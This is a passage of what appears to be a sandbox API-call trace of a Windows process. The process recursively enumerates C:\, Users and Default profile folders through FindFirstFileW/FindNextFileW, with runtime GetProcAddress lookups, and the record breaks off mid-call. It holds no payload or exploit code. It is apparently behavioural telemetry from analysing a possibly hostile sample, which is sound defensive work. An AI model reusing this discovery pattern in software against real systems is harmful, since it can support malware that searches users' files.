ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0256.623] CreateFileW (lpFileName="C:\\" (normalized: "c:"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.623] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x123a3a30 | out: lpFindFileData=0x123a3a30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x8fef80 [0256.625] GetProcAddress (hModule=0x75600000, lpProcName="FindNextFileW") returned 0x756269a0 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0xa8d4eb26, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xa99bf471, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0256.625] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x7025ad0, ftLastAccessTime.dwHighDateTime=0x1d82a29, ftLastWriteTime.dwLowDateTime=0x7025ad0, ftLastWriteTime.dwHighDateTime=0x1d82a29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xa99bf471, ftLastWriteTime.dwHighDateTime=0x1d82a28, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0x0, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0256.626] FindNextFileW (in: hFindFile=0x8fef80, lpFindFileData=0x123a3ab0 | out: lpFindFileData=0x123a3ab0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.626] GetProcAddress (hModule=0x75600000, lpProcName="FindClose") returned 0x756268e0 [0256.626] FindClose (in: hFindFile=0x8fef80 | out: hFindFile=0x8fef80) returned 1 [0256.627] CreateFileW (lpFileName="C:\\\\PerfLogs" (normalized: "c:\\perflogs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.628] FindFirstFileW (in: lpFileName="C:\\\\PerfLogs\\*", lpFindFileData=0x123a3920 | out: lpFindFileData=0x123a3920*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fea40 [0256.628] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.629] FindNextFileW (in: hFindFile=0x8fea40, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.629] FindClose (in: hFindFile=0x8fea40 | out: hFindFile=0x8fea40) returned 1 [0256.629] CreateFileW (lpFileName="C:\\\\Recovery" (normalized: "c:\\recovery"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.629] FindFirstFileW (in: lpFileName="C:\\\\Recovery\\*", lpFindFileData=0x123a3920 | out: lpFindFileData=0x123a3920*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feb80 [0256.630] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.630] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x5feba6e9, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5feba6e9, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="WINDOW~1")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feb80, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.631] FindClose (in: hFindFile=0x8feb80 | out: hFindFile=0x8feb80) returned 1 [0256.631] CreateFileW (lpFileName="C:\\\\Users" (normalized: "c:\\users"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.631] FindFirstFileW (in: lpFileName="C:\\\\Users\\*", lpFindFileData=0x123a3920 | out: lpFindFileData=0x123a3920*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8feac0 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3757c8c, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x973af366, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x973af366, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0256.631] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0256.632] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 1 [0256.632] FindNextFileW (in: hFindFile=0x8feac0, lpFindFileData=0x123a39a0 | out: lpFindFileData=0x123a39a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0256.632] FindClose (in: hFindFile=0x8feac0 | out: hFindFile=0x8feac0) returned 1 [0256.632] CreateFileW (lpFileName="C:\\\\Users\\Default" (normalized: "c:\\users\\default"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0256.632] FindFirstFileW (in: lpFileName="C:\\\\Users\\Default\\*", lpFindFileData=0x123a3810 | out: lpFindFileData=0x123a3810*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8fe900 [0256.637] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0256.638] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0256.638] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d54d8a8, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d54d8a8, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d54d8a8, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0256.638] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0256.638] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0256.638] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5d527734, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d527734, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | out: lpFindFileData=0x123a3890*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd9eaaa, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0256.639] FindNextFileW (in: hFindFile=0x8fe900, lpFindFileData=0x123a3890 | 